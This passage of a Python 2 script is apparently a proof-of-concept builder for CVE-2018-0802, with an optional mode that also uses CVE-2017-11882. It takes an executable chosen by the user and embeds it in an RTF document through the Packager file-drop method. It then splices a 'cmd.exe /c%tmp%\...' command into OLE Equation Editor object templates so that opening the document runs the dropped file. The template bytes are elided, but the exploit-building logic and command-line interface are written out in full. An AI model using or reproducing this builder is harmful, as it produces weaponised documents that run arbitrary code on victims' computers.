"""

OBJDATA_TEMPLATE_0802 = R"""
...
"""

OBJDATA_TEMPLATE_11882 = R"""
...
"""


def create_ole_exec_primitive(command, objdata_template, command_offset, max_len):
    if len(command) > max_len:
        raise ValueError("primitive command must be shorter than %d bytes" % max_len)
    hex_command = command.ljust(max_len).encode("hex")
    objdata_hex_stream = objdata_template.translate(None, "\r\n")
    ole_data = (objdata_hex_stream[:command_offset] + hex_command
                + objdata_hex_stream[command_offset + len(hex_command):])
    return OBJECT_HEADER + ole_data + OBJECT_TRAILER


def create_rtf(header, trailer, executable, double):
    # CVE-2018-0802 exploit
    ole1 = create_ole_exec_primitive("cmd.exe /c%tmp%\\{}".format(os.path.basename(executable)),
                                     OBJDATA_TEMPLATE_0802, (0xd12*2), 126)
    p = Package(executable)
    package = p.build_package()
    outbuf = header + package + ole1
    if double:
        # CVE-2017-11882 exploit
        outbuf += create_ole_exec_primitive("cmd.exe /c%tmp%\\{}".format(os.path.basename(executable)),
                                            OBJDATA_TEMPLATE_11882, (0x949*2), 43)
    return outbuf + trailer


if __name__ == '__main__':
    parser = argparse.ArgumentParser(description="PoC for CVE-2018-0802 using Packager.dll file drop method")
    parser.add_argument("-e", "--executable", help="File to embed and exec", required=True)
    parser.add_argument('-o', "--output", help="Output exploit rtf", required=True)
    parser.add_argument('-d', "--double",
                        help="Double-whammy! Exploits both CVE-2018-0802 and CVE-2017-11882 in the same document.",
                        action="store_true")
    args = parser.parse_args()
    with open(args.output, 'w') as f:
        f.write(create_rtf(RTF_HEADER, RTF_TRAILER, args.executable, args.double))
    print "[+] Completed!"
```